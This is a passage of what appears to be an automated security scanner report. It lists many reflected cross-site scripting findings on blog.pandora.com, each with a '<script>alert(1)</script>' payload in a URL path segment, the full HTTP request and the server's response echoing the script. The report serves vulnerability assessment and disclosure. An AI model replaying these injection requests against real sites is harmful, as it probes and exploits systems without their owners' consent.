<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives6b806<script>alert(1)</script>2370e6bb9b0/2010/10/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...

3.282. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/hoboken-town-ha.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8496d<script>alert(1)</script>895ffd7f0fa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20108496d<script>alert(1)</script>895ffd7f0fa/10/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...

3.283. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/hoboken-town-ha.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 297e2<script>alert(1)</script>6746ce0f566 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10297e2<script>alert(1)</script>6746ce0f566/hoboken-town-ha.html was not found on this server.</p>
...[SNIP]...

3.284. http://blog.pandora.com/pandora/archives/2010/10/hoboken-town-ha.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/hoboken-town-ha.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5a107<script>alert(1)</script>7d716b47026 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10/hoboken-town-ha.html5a107<script>alert(1)</script>7d716b47026 was not found on this server.</p>
...[SNIP]...

3.285. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/pandora-one-gif.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeade<script>alert(1)</script>36a25f2db79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraaeade<script>alert(1)</script>36a25f2db79/archives/2010/10/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...

3.286. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/pandora-one-gif.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f952<script>alert(1)</script>8da5452ad57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives5f952<script>alert(1)</script>8da5452ad57/2010/10/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...

3.287. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/pandora-one-gif.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2f17b<script>alert(1)</script>64bc9a276f8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20102f17b<script>alert(1)</script>64bc9a276f8/10/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...

3.288. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/pandora-one-gif.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 976b9<script>alert(1)</script>41935888f21 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:42 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10976b9<script>alert(1)</script>41935888f21/pandora-one-gif.html was not found on this server.</p>
...[SNIP]...

3.289. http://blog.pandora.com/pandora/archives/2010/10/pandora-one-gif.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/10/pandora-one-gif.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27156<script>alert(1)</script>bb3cfa82e19 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:45 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/10/pandora-one-gif.html27156<script>alert(1)</script>bb3cfa82e19 was not found on this server.</p>
...[SNIP]...

3.290. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27324<script>alert(1)</script>f28ce60039 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora27324<script>alert(1)</script>f28ce60039/archives/2010/11/ was not found on this server.</p>
...[SNIP]...

3.291. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31461<script>alert(1)</script>df1666c9e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 348

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives31461<script>alert(1)</script>df1666c9e6/2010/11/ was not found on this server.</p>
...[SNIP]...

3.292. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1142<script>alert(1)</script>f83864e82ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:19 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ was not found on this server.</p>
...[SNIP]...

3.293. http://blog.pandora.com/pandora/archives/2010/11/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f51a<script>alert(1)</script>191470466ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ was not found on this server.</p>
...[SNIP]...

3.294. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/fantastic-fargo.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72e6e<script>alert(1)</script>09b739b49da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:23 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...

3.295. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/fantastic-fargo.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a3828<script>alert(1)</script>87512ebd2ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 369
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...

3.296. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/fantastic-fargo.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 39bf5<script>alert(1)</script>8b77ea0b66d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...

3.297. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/fantastic-fargo.html

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a869d<script>alert(1)</script>14889bb3dee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:31 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 369

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html was not found on this server.</p>
...[SNIP]...

3.298. http://blog.pandora.com/pandora/archives/2010/11/fantastic-fargo.html [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://blog.pandora.com
Path:	/pandora/archives/2010/11/fantastic-fargo.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f3d62<script>alert(1)</script>1d21570497f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
